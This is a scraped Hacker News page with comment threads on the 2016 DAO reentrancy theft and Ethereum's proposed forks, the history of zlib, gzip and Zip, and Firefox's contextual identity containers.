Response from the official Ethereum Foundation: https://blog.ethereum.org/2016/06/17/critical-update-re-dao-...
32
csomar 19 hours ago 0 replies      
Well, that wasn't long. And we might have just found the single biggest reason against smart contracts.
33
anotheryou 17 hours ago 0 replies      
Why is there so much money in such a young cryptocurrency?

It's young software; of course it will flail around a little.

Is it because the beginning is where you make the bet to become really rich when the thing lifts off?

34
xorcist 8 hours ago 0 replies      
The DAO is written by consultants specializing in Ethereum contracts. They have core developers on their team. They are good, but one mistake is all it takes. (And their business idea to sell a "DAO framework" is probably going to be hard after this.)

The bug that was exploited here had been public for a week before someone decided to try it in practice. There was time to dispense everyone's ether back, had they taken it seriously. But taking security seriously requires an almost superhuman distance from your work.

The Ethereum developers are actively debating whether to put in logic to replay the blockchain in order to give back everyone's ether. While that's probably a good idea, it also means the company behind Ethereum can reverse any contract. That puts them in a difficult situation, as any smart contract platform will have dissatisfied parties at all times. (In comparison, none of the Bitcoin thefts have been reversed, and it's not clear they could have been, as development is much less tightly knit.)

It's the most exciting thing since the fall of MtGox. The money at stake is comparable (the DAO is about a fourth of what MtGox was in perceived value).

35
bpierre 16 hours ago 1 reply      
Article content:

Posted by Vitalik Buterin on June 17th, 2016.

An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the split function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.

The leaked ether is in a child DAO at https://etherchain.org/account/0x304a554a310c7e546dfe434669c... even if no action is taken, the attacker will not be able to withdraw any ether at least for another ~27 days (the creation window for the child DAO). This is an issue that affects the DAO specifically; Ethereum itself is perfectly safe.

The development community is proposing a soft fork, (with NO ROLLBACK; no transactions or blocks will be reversed) which will make any transactions that make any calls/callcodes/delegatecalls that execute code with code hash 0x7278d050619a624f84f51987149ddb439cdaadfba5966f7cfaea7ad44340a4ba (ie. the DAO and children) lead to the transaction (not just the call, the transaction) being invalid, starting from block 1760000 (precise block number subject to change up until the point the code is released), preventing the ether from being withdrawn by the attacker past the 27-day window. This will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Miners and mining pools should resume allowing transactions as normal, wait for the soft fork code and stand ready to download and run it if they agree with this path forward for the Ethereum ecosystem. DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH.

Contract authors should take care to (1) be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community that will likely be forthcoming in the next week on mitigating such bugs, and (2) avoid creating contracts that contain more than ~$10m worth of value, with the exception of sub-token contracts and other systems whose value is itself defined by social consensus outside of the Ethereum platform, and which can be easily hard forked via community consensus if a bug emerges (eg. MKR), at least until the community gains more experience with bug mitigation and/or better tools are developed.

Developers, cryptographers and computer scientists should note that any high-level tools (including IDEs, formal verification, debuggers, symbolic execution) that make it easy to write safe smart contracts on Ethereum are prime candidates for DevGrants, Blockchain Labs grants and Strings autonomous finance grants.

36
greenspot 19 hours ago 1 reply      
Site doesn't load. Does anyone have a tl;dr for the not so informed? What's DAO? Does Etherum have a weak spot?
37
buttershakes 19 hours ago 2 replies      
This pretty directly contradicts a lot of the hype around Ethereum. Yes, bad contract code is bad, but a lot of money is about to evaporate. If it isn't easy to write secure contracts then there is a serious deployment problem.
38
dnautics 8 hours ago 0 replies      
I currently don't own any ethereum. I'd like to point out that those who are saying this means there's a "too big to fail" concept within Ethereum are missing the key point: when the US (and other places) did too-big-to-fail bailouts, it was a concerted effort between unelected central bankers and government officials who are perceived as not necessarily having the best interests of the people in mind. If Ethereum decides that the DAO is too big to fail, it will at least have done so via consensus, and parties that don't like it can take their assets and leave.
39
wslh 14 hours ago 0 replies      
At the risk of being heavily downvoted: I think it is discussable whether the hackers deserve the money or not when all the security and ethics are based on code, since hacking is a pure part of it. Note that I said "discussable", not right or wrong.

A good thread is evolving about this here: https://www.reddit.com/r/btc/comments/4oibqw/ding_dong_the_d...

41
shocks 19 hours ago 1 reply      
Can someone explain what is going on here?
42
amluto 10 hours ago 1 reply      
Wow, theDAO has a shockingly cavalier attitude to security (https://github.com/slockit/DAO/wiki/The-DAO-v1.0-Code):

> At the time of deployment, it was discovered that the solidity compiler is not deterministic. AST nodes are identified by their raw pointers. So if we iterate over data structures, different raw pointers might result in a different iteration order.

> We originally wanted to let the community deploy The DAO and then just check the bytecode, but this was not possible at the moment of deployment. So instead a fixed transaction bytecode was provided for the community to deploy.

Shouldn't they have waited to deploy until they figured out how to make it verifiable?

43
mcphilip 18 hours ago 0 replies      
New blog post on dao hub. Seems pretty grim:

https://blog.daohub.org/the-dao-is-under-attack-8d18ca45011b...

44
imdsm 15 hours ago 1 reply      
And now for a critical update regarding the DAO vulnerability...

Error establishing a database connection

45
hkjgkjy 18 hours ago 0 replies      
This is massive. I observe with great interest how it will be handled - Ethereum is still young enough that doing a hard fork can be the sensible choice, and people can agree to do so (since such a large portion of ETH is now owned by baddies).

It has been said before, but there ain't no drama like blockchain drama. No TV show, no book, nothing has me following its story like Bitcoin and the other blockchains that came after it. Greatest drama of the millennium, so far.

46
Olscore 19 hours ago 1 reply      
Real time chart for DAO/BTC (Down 41% currently): https://poloniex.com/exchange#btc_dao
47
1012930112 19 hours ago 3 replies      
Is this related to https://www.ethereum.org/ ?

"Ethereum is a decentralized platform for applications that run exactly as programmed without any chance of fraud, censorship or third-party interference."

Right ...

48
joosters 19 hours ago 2 replies      
Slock.it will be so disappointed, they never managed to grab any of the cash from their creation...
49
pure_ambition 14 hours ago 0 replies      
As a non-bitcoin person, I'm sitting here thinking someone's Data Access Object has a vulnerability.
50
curiousgal 17 hours ago 0 replies      
I see a lot of confusion mixed with the good old HN hate for crypto, which is justifiable, but just to be clear: the breach was in a single piece of software written on the Ethereum network (the DAO), not a vulnerability in Ethereum itself. The ETH that is locked is the funds that were paid to that contract (The DAO), not the network's funds.
51
Udo 16 hours ago 0 replies      
As far as attacks go, this seems to fall more within the "for the lolz" category than an actual attempt to take the money. If they had kept it reasonable, say a couple hundred thousand worth, this would probably have gone unnoticed for a long time (maybe long enough for the 27-day payout window to expire).
52
sidthekid 14 hours ago 1 reply      
I can't help but imagine that the attackers/their associates read reddit and online forums, and thus would be vocal in criticizing the soft/hard fork decision. The theft of $50m is being rendered useless in front of their eyes - a maddening situation, I'm sure.
53
melvinmt 7 hours ago 0 replies      
The price of ETH just went from $20.45 to $14.01 in the last 24 hours... I just got out in time and am gonna wait this out a little bit :)

https://www.gdax.com/trade/ETH-USD

54
codingmyway 18 hours ago 1 reply      
The DAO lasted even less time than I thought.
55
pmorici 18 hours ago 0 replies      
ETH's creator just called on exchanges to halt all trading of ETH and DAO.

https://np.reddit.com/r/ethereum/comments/4oif2x/dao_attack_...

56
ProfChronos 15 hours ago 0 replies      
Why does everyone conflate a decentralized system with a self-controlled system? Decentralization doesn't mean there is no power to regulate or no coordination between users/agents; it is just an architectural model for a system in which power belongs to local entities. That absolutely doesn't mean there aren't rules and bodies to defend them [1].

[1] https://www.intgovforum.org/cms/wks2015/uploads/proposal_bac...
57
eblanshey 13 hours ago 1 reply      
Many people here are stating that its purpose is tainted if they can just undo what the attacker did. After all, why not just have a centralized authority?

I haven't researched this deeply, admittedly, but I think the idea is that they're using consensus from the community in order to undo what the attacker did. In other words, if the community didn't support it, it wouldn't be possible to do at all. Contrast this with a centralized authority that didn't need community involvement at all.

58
newobj 11 hours ago 0 replies      
I don't really understand smart contracts yet, but wouldn't it have been possible to implement the DAO in such a way that forks/cancellations could be "voted" on by the network, versus requiring whatever this is going to require? A code fork? At least the fork would have been "decentralized" then... this does not bode well at all.
59
return0 18 hours ago 1 reply      
Is this a weakness of Ethereum or of the DAO? How much analog (fiat) money was invested in the DAO in total?
60
barisser 13 hours ago 0 replies      
What concerns me is that they want to do a soft-fork to handle just this case. One shouldn't fiddle with the protocol every time something like this happens.
61
runn1ng 15 hours ago 0 replies      
62
ikeboy 14 hours ago 0 replies      
Not loading for me, see https://archive.is/YkANN
63
Animats 5 hours ago 0 replies      
Ethereum just had its busiest day of trading ever and is down 25%.
64
kerkeslager 14 hours ago 1 reply      
It seems to me that the DAO is a large enough player in the Ethereum community that this plan is likely to succeed. If it does, it will be the first example I know of where a 51% attack was successfully executed against a popular blockchain.

Whether or not this is a desirable thing depends on your goals. From the perspective of the Ethereum community, which is heavily invested in the DAO, it makes a lot of sense. Even if this vulnerability causes you to write off the DAO as a failed experiment, it makes sense to recover some of your lost value before you exit.

However, for my goals, this causes me to write off Ethereum as a cryptocurrency I will never, ever use. It's breaking the fundamental benefits of the cryptocurrency to fix the problems of one group. And further, if this is possible for Ethereum, it makes me think that a 51% attack is more plausible for other cryptocurrencies. This worries me. I'd like to see more research put into defending against 51% attacks.

65
artursapek 11 hours ago 0 replies      
The price of DAO has tanked: https://cryptowat.ch/kraken/daobtc/1h
66
Udo 15 hours ago 2 replies      
As an outsider, this is stunning to me: why isn't there a contract revocation mechanism? Considering these things are programmable, it could be something as simple as a killswitch hash sitting in a lawyer's safe somewhere, right?
67
fovc 9 hours ago 0 replies      
If the attacker is just moving funds into a child DAO, could someone else attack the attacker? A digital Robin Hood?
68
granaldo 17 hours ago 0 replies      
Market is reacting to it: https://www.coingecko.com/en/price_charts/ethereum/usd

Ethereum down from $21 to $15 in minutes
69
_pdp_ 15 hours ago 0 replies      
Since when are programming languages considered safe from logic flaws?
70
pmorici 19 hours ago 0 replies      
For context, 2 million ETH is in the 30-40 million USD range at recent market prices.
71
__jal 13 hours ago 1 reply      
One thing I'll say for Ethereum - the problems they have read like the flavor text from a Vernor Vinge novel.
72
baldeagle 16 hours ago 0 replies      
It looks like it stopped at 6am Central US. Maybe someone ran it as a scheduled job thinking they could be sneaky about it before becoming inattentive?
73
twoodfin 16 hours ago 0 replies      
Serious questions: Is this a crime? Should it be?
74
dolguldur 10 hours ago 0 replies      
Poor Ethereum now gets the bad press for TheDAO's hasty mistakes.
75
espadrine 16 hours ago 0 replies      
An official statement was issued by Ethereum: https://blog.ethereum.org/2016/06/17/critical-update-re-dao-...

Since it is under load, here is a copy:

An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the split function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.

The leaked ether is in a child DAO at https://etherchain.org/account/0x304a554a310c7e546dfe434669c... even if no action is taken, the attacker will not be able to withdraw any ether at least for another ~27 days (the creation window for the child DAO). This is an issue that affects the DAO specifically; Ethereum itself is perfectly safe.

The development community is proposing a soft fork, (with NO ROLLBACK; no transactions or blocks will be reversed) which will make any transactions that make any calls/callcodes/delegatecalls that execute code with code hash 0x7278d050619a624f84f51987149ddb439cdaadfba5966f7cfaea7ad44340a4ba (ie. the DAO and children) lead to the transaction (not just the call, the transaction) being invalid, starting from block 1760000 (precise block number subject to change up until the point the code is released), preventing the ether from being withdrawn by the attacker past the 27-day window. This will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Miners and mining pools should resume allowing transactions as normal, wait for the soft fork code and stand ready to download and run it if they agree with this path forward for the Ethereum ecosystem. DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH.

Contract authors should take care to (1) be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community that will likely be forthcoming in the next week on mitigating such bugs, and (2) avoid creating contracts that contain more than ~$10m worth of value, with the exception of sub-token contracts and other systems whose value is itself defined by social consensus outside of the Ethereum platform, and which can be easily hard forked via community consensus if a bug emerges (eg. MKR), at least until the community gains more experience with bug mitigation and/or better tools are developed.

Developers, cryptographers and computer scientists should note that any high-level tools (including IDEs, formal verification, debuggers, symbolic execution) that make it easy to write safe smart contracts on Ethereum are prime candidates for DevGrants, Blockchain Labs grants and Strings autonomous finance grants.

Vitalik Buterin

76
ZenoArrow 17 hours ago 0 replies      
Whilst it's bad that people's money is being stolen, this could end up being a good thing for cryptocurrencies. Investors burned by this will certainly be demanding more robust security around cryptocurrencies in the future.
77
8ig8 15 hours ago 0 replies      
78
infodroid 15 hours ago 0 replies      
This is what happens when you are the first cryptocurrency with a Turing complete scripting language.
80
fabled_giraffe 17 hours ago 0 replies      
I suggest putting money into the stock market instead. It's much more consistent, e.g. http://finance.yahoo.com/echarts?s=%5EGSPC+Interactive#symbo...
81
known 19 hours ago 1 reply      
82
Annatar 17 hours ago 1 reply      
EtherScan is a Block Explorer and Analytics Platform for Ethereum, which is a decentralized platform that runs smart contracts.

What is this platform??? What is "DAO"??? What are "Uncles"??? What is "Ethereum"???

83
arisAlexis 17 hours ago 0 replies      
So the attacker can buy very cheap ETH/DAO right now, then somehow stop/reverse the attack, send the money back, claim it was white-hat hacking, and effectively launder all the money he gained as legitimate.
84
newobj 11 hours ago 0 replies      
"Put a fork in it"
85
powera 6 hours ago 0 replies      
I always thought nobody had any actual plans as to how the DAO could do anything useful.

Now I guess we know it won't. Either "hackers" will bankrupt it, or all the decentralization zealots will back out (and bankrupt it).

86
dreamdu5t 12 hours ago 0 replies      
The hacker should sue them for violating the contract by trying to fork and block him!
87
pmorici 19 hours ago 0 replies      
This can't be good for the price of ETH.
88
CyberDildonics 15 hours ago 0 replies      
While it is easy to cherry pick past comments and pretend it was insight instead of luck, I have to say my intuition was pretty quickly validated that so much money in something so untested and complicated was excessively risky:

https://news.ycombinator.com/threads?id=CyberDildonics&next=...

89
imaginenore 16 hours ago 0 replies      
They are proposing a soft fork for one specific case and one specific hash. It's a house of cards.
90
koolba 15 hours ago 1 reply      
What else did people expect would happen if you give them an arsenal of loaded foot guns?
91
vegabook 16 hours ago 1 reply      
Anyway, Ethereum feels like a cult. There's something weirdly disturbing for me about the ethos of blockchain technology, and how it jars with "The DAO" (note the capitalised definite article. There Is Only One. Hardly distributed or democratic). Also look at how a bunch of ethereum shills pack its "Curator", for which, by the way, The DAO is "incredibly privileged"[1]. What? Your own organization is incredibly privileged that you appointed yourself to it?

Even the name "ethereum" is pretentious and showy - again, counter to a distributed ethos.

I don't get a strong comfort level that this organization is any better than the current central banks.

[1] https://daohub.org/curator.html

92
homakov 17 hours ago 0 replies      
Isn't it a race condition?
93
yoloswag1 18 hours ago 1 reply      
Anyone know how to short ETH?
94
howfun 19 hours ago 3 replies      
Site doesn't open.
95
nickpsecurity 12 hours ago 0 replies      
This is an example of why I created my mantra for high-assurance security: "tried and true beats novel and new." Another is to wait at least 10 years for specific tech and techniques to prove themselves out before betting lives or entire businesses on them (startups an exception).

The blockchain and DAO models are very new. They introduce new mathematical constructs, complex code, security issues we haven't thought about, coordination among many parties for such issues, and so on. Ethereum even includes an interpreter or something, which has its own set of risks. So, I refused to bet on such models, given that enormous risk means stuff is going to happen to them that isn't going to happen to regular financial processing. We also have mitigations for most of its risks.

Today is a good example. This is the kind of thing you're not going to see the Federal Reserve, VISA/Mastercard, most banks, or even large eCommerce sites announce. It probably won't be the last announcement of an unusual issue. So, anyone wanting stable currency + commerce should avoid stuff like Ethereum unless they're just investing small amounts to help them experiment & improve. Risk/reward doesn't make sense on such immature tech.

96
reddytowns 16 hours ago 0 replies      
Update, the coins stolen can't be spent for 27 days and Vitalik (one of the creators of ethereum) is proposing a fork to refund the ether. https://steemit.com/ethereum/@vladislav/critical-update-re-d...
97
goldenkey 19 hours ago 0 replies      
Article about The DAO since parent link is flaky: http://www.coindesk.com/the-dao-just-raised-50-million-but-w...
98
y04nn 19 hours ago 0 replies      
That sounds pretty bad
99
specialist 12 hours ago 3 replies      
"The "hacker" simply used the DAO as it was meant to be used ... and deserves the funds."

Exactly. DAO is CoreWar meets Nomic.

https://en.wikipedia.org/wiki/Core_War

https://en.wikipedia.org/wiki/Nomic

Designers of rulesets (laws, board games, markets, control systems) ignoring Gödel's incompleteness theorems should themselves be ignored. Just like we ignore inventors of perpetual motion machines who ignore the laws of thermodynamics.

https://en.wikipedia.org/wiki/Gdel%27s_incompleteness_theor...

100
janan11 18 hours ago 0 replies      
They are returned to the wallet they were sent from. It would then be up to the exchange to manually refund the ETH.
101
jeanduluoz 12 hours ago 1 reply      
Looks like security agencies are placing extra guards at important national security sites like the statue of liberty, NSA, and Best Buy: http://i.imgur.com/5c9H6DO.gif
102
gwbas1c 15 hours ago 0 replies      
Hahaha! Let me go refill my popcorn!
103
varav 18 hours ago 0 replies      
In case anybody is wondering how this happened, it looks like the attack is exploiting the "recursive call via default function" vulnerability [1].

[1]: http://vessenes.com/more-ethereum-attacks-race-to-empty-is-t...

104
6d6b73 15 hours ago 3 replies      
Hm, I wonder why people are panicking over virtual money and acting like they've lost something tangible. It's like crying over Monopoly dollars. :)
12
How are zlib, gzip and Zip related? (2013) stackoverflow.com
437 points by yurisagalov  11 hours ago   100 comments top 16
1
lpage 7 hours ago 3 replies      
In other compression news, Apple open sourced their implementation of lzfse yesterday: https://github.com/lzfse/lzfse. It's based on a relatively new type of coding - asymmetric numeral systems. Huffman coding is only optimal if you consider one bit as the smallest unit of information. ANS (and more broadly, arithmetic coding) allows for fractional bits and gets closer to the Shannon limit. It's also simpler to implement than (real world) Huffman.

Unfortunately, most open source implementations of ANS are not highly optimized and quite division heavy, so they lag on speed benchmarks. Apple's implementation looks pretty good (they're using it in OS X, err, macOS, and iOS) and there's some promising academic work being done on better implementations (optimizing Huffman for x86, ARM, and FPGA is a pretty well studied problem). The compression story is still being written.

2
chickenbane 9 hours ago 4 replies      
Not only is this a great read, but the follow-up asking for citations is answered with "I am the reference".

If this were reddit I'd post the hot fire gif. Eh, here it is anyway: http://i.imgur.com/VQLGJOL.gif

3
sikhnerd 9 hours ago 2 replies      
It's annoyingly common how the OP doesn't mark this answer as accepted, or even acknowledge how amazing this answer is from one of the technology's creators -- instead just goes on to ask a followup.
4
kbenson 9 hours ago 3 replies      
It seems like it wouldn't be that hard to create an indexed tar.gz format that's backwards compatible.

One way would be to use the last file in the tar as the index, and as files are added, you can remove the index, append the new file, append some basic file metadata and the compressed offset (maybe of the deflate chunk) into the index, update the index size in bytes in a small footer at the end of the index, and append to the compressed tar (add).

You can retrieve the index by starting at the end of the compressed archive and reading backwards until you find a deflate header (at most 65k plus a few more bytes, since that's the size of a deflate chunk). If it's an indexed tar, the last file will be the index, and the end of the index will be a footer with the index size (so you know the maximum you'll need to seek back from the end). This isn't extremely efficient, but it is limited in scope, and helped by knowing the index size.

You could verify the index by checking some or all of the reported file byte offsets. Worst case scenario is small files with one or more per deflate chunk, and you would have to visit each chunk. This makes the worst case scenario equivalent to listing files an un-indexed tar.gz, plus the overhead of locating and reading the index (relatively small).

Uncompressing the archive as a regular tar.gz would result in a normal operation, with an additional file (the index) included.

I imagine this isn't popular not because it hasn't been done, but because most people don't really need an index.

5
rdslw 8 hours ago 1 reply      
A worthwhile answer about the coolest kid on the block, the xz compression algorithm (of LZMA fame), plus tar.gz vs tar.xz scenarios/discussion.

http://stackoverflow.com/questions/6493270/why-is-tar-gz-sti...

6
winterismute 6 hours ago 0 replies      
My father teaching me to type PKUNZIP on files that "ended with .zip" in the DOS shell (not long before the Norton Commander kind of GUI arrived on our computer) is one of my earliest memories as a toddler: I would ask him "What does it mean?" and he would simply not know. It was 1990 and I was 3 and a half, I think. When I learned what it stood for, it was kind of epic for me.
7
hardwaresofton 5 hours ago 0 replies      
It is rare to be able to have a question answered so completely and from such a first-hand source. This post is gold and tickles me in all the right places.

StackOverflow is sitting on a veritable treasure trove of knowledge.

8
the_common_man 9 hours ago 2 replies      
One important difference in practice is that zip files need to be saved to disk to be extracted. gzip files, on the other hand, can be stream-unzipped, i.e. curl http://example.com/foo.tar.gz | tar zxvf - is possible, but not with zip files. I am not sure if this is a limitation of the unzip tool. I would love to know if there is a workaround for this.
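 
(A possible workaround, sketched under assumptions: if libarchive's bsdtar is installed, it can read many zip archives from a pipe, since it parses the per-file local headers rather than seeking to the central directory at the end; Info-ZIP's funzip also streams, but only the first member. The URLs are placeholders.)
 
 curl -s https://example.com/foo.zip | bsdtar -xf -   # stream-extract a zip, if bsdtar is available
 curl -s https://example.com/foo.zip | funzip > foo   # funzip streams the first member only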
9
404-universe 9 hours ago 4 replies      
Where do the other popular compression utilities (e.g. bzip2, xzip, lzma, 7zip) fit in to this?
10
tdicola 8 hours ago 4 replies      
Wow a stackoverflow question that hasn't been closed or removed for some trivial reason--thought I'd never see something like that again.
11
minionslave 9 hours ago 3 replies      
It's kinda bad-ass when he said: you can use this text on Wikipedia, I'm the primary reference.
12
coryfklein 5 hours ago 0 replies      
I love the discussion in the comments:

> This post is packed with so much history and information that I feel like some citations need be added incase people try to reference this post as an information source. Though if this information is reflected somewhere with citations like Wikipedia, a link to such similar cited work would be appreciated. - ThorSummoner

> I am the reference, having been part of all of that. This post could be cited in Wikipedia as an original source. - Mark Adler

13
virtualized 8 hours ago 5 replies      
But can he invert a binary tree and is he willing to relocate to San Francisco?
14
adontz 8 hours ago 1 reply      
When I read "I am the reference" it reminded me of "I am the danger".

https://www.youtube.com/watch?v=3v_zlyHgazs

15
new_hackers 5 hours ago 0 replies      
When Chuck Norris computes checksums, he uses Adler-32
16
agumonkey 9 hours ago 2 replies      
Archived link just in case: http://archive.is/SvUO5
13
Contextual Identities on the Web mozilla.org
537 points by ronjouch  1 day ago   134 comments top 53
1
amluto 1 day ago 5 replies      
If we can get Tor Browser's first party origin feature in as well, this will be fantastic! I would love to have the ability to type www.facebook.com and get a context that isn't linked to the rest of my tabs.

I also want ephemeral containers so I could open a tab that forgets its cookies when I'm done. Think private browsing but without forgetting my history, requiring a new window, or being limited to one context at a time.

2
fps 1 day ago 3 replies      
Firefox's clumsy profile support is the one thing that makes me keep switching back to chrome. I really prefer firefox sync to chrome's implementation, and some of firefox's tab organization tools are way better than chrome's. But I use many of the same webapps in my personal life as I do in my work life, and being able to run two profiles simultaneously, and start them up without having to launch firefox from the terminal every time, was difficult.

What they've implemented seems to be better than chrome's profiles, in that it's easier to create a new profile for a specific context (so I don't have to sort things into a "work" bucket and a "personal" bucket.) It will be interesting to see how the contexts interact with plugins.

3
red_admiral 1 day ago 3 replies      
This could not be more welcome at a time when facebook (UK) is displaying a new bar across the top of its page saying that by using it, I agree:

"By clicking or navigating the site, you agree to allow our collection of information on and off Facebook through cookies."

I already have a separate chromium "person" set up for facebook; might give firefox another go when this gets released.

4
masklinn 1 day ago 4 replies      
That looks neat. And if it were possible to cheaply create and delete contextual identities on the fly it would even fix an issue I had today: the difficulty of multiple separate private browsing sessions in the same browser.
5
breakingcups 1 day ago 0 replies      
This seems very useful for its intended use-case. At first glance I would like to note, however, that advertisers (and other parties) will probably still be able to track you across these "containers", due to not isolating HSTS flags and similar features.

I also wonder whether a separate banking container makes a lot of sense when doing online payments, as in my country we get redirected to our bank to do payments. This might create confusion among non-tech-savvy users ("but this should be in my banking container, I'll just switch. Why does the webshop give an error upon returning now?").

Overall a really cool feature though and one that might persuade me to give Firefox a try as daily driver again.

6
BugsBunnySan 1 day ago 2 replies      
Omg, finally this exists :D

I think this is the actual solution to the problem that 'private browsing' was trying to fix when it first came out.

7
beagle3 1 day ago 0 replies      
This is a great step in the right direction -- though it is not enough. Different identities would still be going through the same IP (not much one can do about that). But some things that can be solved are NOT addressed with containers:

- everything panopticlick uses (fonts list, plugin lists, timezone, agent, etc.)

- everything panopticlick doesn't use, but the bad guys do (aa font signatures, ...)

- plugin abuse - e.g., Flash 'cookies', Silverlight 'isolated storage', Java JNLP properties

- see EverCookie[0] for more things that have been known to occur in the wild (and remember it is outdated). the article mentions cache is not shared, but e.g. HSTS pinning is. evercookie easily pierces through this system.

Since 2005 or so, I have had different users for different purposes; not sure how well it works on Windows these days (it used to not work at all back in 2005) - but on Linux, it's just a "sux - otheruser" or "sudo -u otheruser" command away, and it is well isolated on the web side[1].

[0] https://samy.pl/evercookie/

[1] Full X11 isolation requires a lot more effort - but luckily it seems that recent browsers don't let websites abuse that
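 
(A minimal sketch of that separate-user approach on Linux; the dedicated "browsing" user and the xhost grant are assumptions, and as footnote [1] says, this is not full X11 isolation:)
 
 xhost +SI:localuser:browsing   # let that user draw on your X display
 sudo -u browsing -H firefox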

8
Monkey0x9 1 day ago 1 reply      
This is the way to go for Firefox: instead of copying Google Chrome, creating new and useful features.
9
yAnonymous 1 day ago 2 replies      
Vote-brigading and trolling have never been so easy! All sarcasm aside, it is a great feature.
10
james-turner 1 day ago 0 replies      
This looks really promising. The identity problem in browsers is something I tried to solve by customising the look of different Firefox instances opened with different profiles[1] (one for personal use, one for work etc). But having this functionality built in is definitely preferable.

[1] https://github.com/jamesturner/firefox-profile-indicator

11
WA 1 day ago 0 replies      
I solved this so far by using two different browsers. But this is cumbersome and Mozilla now makes sure that I only use their product. This is good, because I like Firefox.
12
lucb1e 1 day ago 1 reply      
This is fantastic! I've been wanting this for a few years, but didn't think anyone else would care enough to get this on a browser's todo list. Awesome to see Mozilla doing this!
13
azeirah 1 day ago 0 replies      
Oh that sure does seem really useful :o

I hope they keep going into this direction

14
mark_l_watson 1 day ago 0 replies      
Great idea that makes me glad I use Firefox (settings for maximum privacy and discard all cookies when browser shuts down; I also use Chrome for Google properties, Twitter and Facebook).

With Firefox containers I suppose I could drop my two Browser setup, but I won't, at least for now.

15
eliaspro 12 hours ago 0 replies      
This is like a match made in heaven for Activities in KDE Plasma.

http://cukic.co/2016/02/08/heavy-activities-setup/

Now if only Firefox AddOns/Extensions were able to properly access DBus, this would allow for so much better Linux integration (storing passwords through org.freedesktop.Secret, opening URLs in the appropriate container from KDE Plasma sessions instead of random switches to another activity where a Firefox window is found, global media playback states/control for web video/audio as org.mpris.MediaPlayer2, powermanagement inhibitors through org.freedesktop.login1, etc)

16
eximius 23 hours ago 0 replies      
This is a huge step in the right direction.

However, my personal vision is taking this one step further with an 'identity management' daemon running on your computer, or a hardware token, which acts as a cryptographic agent on behalf of your identities. So firefox, chrome, or whatever application could request a credential for some service and your daemon would pop up and ask you which identity's credentials to use or if you'd like to make a new one (U2F or some other system).

17
notifier2050 1 day ago 0 replies      
Wow, this is insanely cool! I've been thinking of creating an add-on to be able to log in to multiple Google accounts from different tabs, but they managed to create it faster!
18
LOSEYOURSELF 1 day ago 1 reply      
Isn't it kind of fucking horrific you have to think about your "browsing identity" at all?
19
greggman 1 day ago 1 reply      
Very cool.

I think I'd love to be able to define which domains open in which contexts, so if I click a link that happens to be to something I want in another context ...

But that got me thinking just how effective will this be? If someone sends me a link in fb and I click it. Even if it opens in a new context it seems like it's only a matter of time before all the links are changed to https://destsite.com/path/to/resource#fbtrackingid or something similar which then adds the cookie across contexts?

20
Pxtl 1 day ago 0 replies      
I'm not sure about Firefox's implementation of it, but throughout computing I'm seeing more and more need for this kind of thing, not to mention something softer than full user-account switching for handing a device between family members or teammates. As everything gets more personalized and more tightly bound to the user by learning their habits and typing and voice and all that, while in a social networking context we simultaneously broadcast stuff about ourselves incidentally (like YouTube learning your viewing preferences and likes), the ability to switch context neatly and quickly is becoming more important.
21
arenaninja 1 day ago 1 reply      
Very cool feature! I remember a friend of mine having a use for this as far back as 8 years ago. I hope you're happy now Richard!
22
nixpulvis 1 day ago 0 replies      
I literally just read the paper [1] a few days ago, pretty interesting. It lays out a lot of work and thought to be done.

[1] http://www.ieee-security.org/TC/W2SP/2013/papers/s1p2.pdf

23
Grue3 1 day ago 1 reply      
The idea is good, but what's with the identities they chose? "Personal", "Work", "Banking", "Shopping"? Is "Shopping" supposed to be a euphemism for "Porn"? As far as I can tell, nobody has a "shopping" Twitter account.
24
dubcanada 1 day ago 0 replies      
This actually looks awesome.
25
pc2g4d 1 day ago 0 replies      
Digital marketing companies are moving to reduce or eliminate their dependence on cookies for identifying users, so unless they add some Tor-like functionality to this tool that makes you appear to be connecting from a different IP address, I don't see this having much of a long-term privacy impact.

That said, no need to volunteer any more information than necessary to use online services.

If you haven't seen it, you should definitely check out https://panopticlick.eff.org/

26
MzHN 1 day ago 0 replies      
Ah yes, thank you, finally!

I can't emphasize enough how much I've been waiting for this.

I've even tried pushing it via the dev-tools uservoice as a developer tool instead of a privacy tool, since you often need to test with multiple sessions at the same time. No reaction.

There is still the very real issue of fingerprinting across containers, which they point at towards the end of the article, but this might just be enough for me to drop Chrome completely and get my Firefox set up again the way I like it.

27
natrius 1 day ago 0 replies      
This sounds better than my current solution of multiple Chrome profiles, but how does this interact with extensions? So many extensions require broad permissions that give them nearly as much power as the browser vendor themselves. With separate Chrome profiles, I can keep sketchy extensions away from sensitive credentials. I hope these containers do something similar, because I think the UX of per-tab containers might be superior to per-window profiles.
28
danbruc 1 day ago 0 replies      
Supported at least since IE 8 (2009) [1], not sure how multiple instances behaved before.

[1] https://blogs.msdn.microsoft.com/ie/2009/05/06/session-cooki...

29
pmontra 1 day ago 0 replies      
Wonderful. I'm looking forward to a feature to automatically create a container for every new tab, unless explicitly told to open a tab in the existing container. Example: two tabs for the same site, right click, Open Link in New Tab (same container). The browser default could be opening in the same container. An about:config switch would be ok, we'll find it.
30
return0 1 day ago 0 replies      
I prefer to use separate browser instances with different --user-data-dir (in Chrome; I don't know the equivalent in Firefox). Adding a different color theme helps to immediately discriminate between them.

Having tabs from different contexts in the same window is confusing.
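 
(A sketch of that setup; the paths and profile name are invented, and Firefox's rough equivalent is named profiles run with -no-remote:)
 
 google-chrome --user-data-dir="$HOME/.browser/work" &
 google-chrome --user-data-dir="$HOME/.browser/personal" &
 firefox -no-remote -P work &   # Firefox: create the "work" profile first via firefox -P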

31
kirkdouglas 1 day ago 1 reply      
It seems that Firefox is becoming relevant again.
32
kevinSuttle 1 day ago 0 replies      
This is pretty much spot on what Edward Snowden described for his vision of digital identity.

https://gist.github.com/mnot/382aca0b23b6bf082116

33
siscia 1 day ago 1 reply      
I am wondering what will happen to all the web ad companies if this feature gets deployed and used widely.
34
skybrian 1 day ago 2 replies      
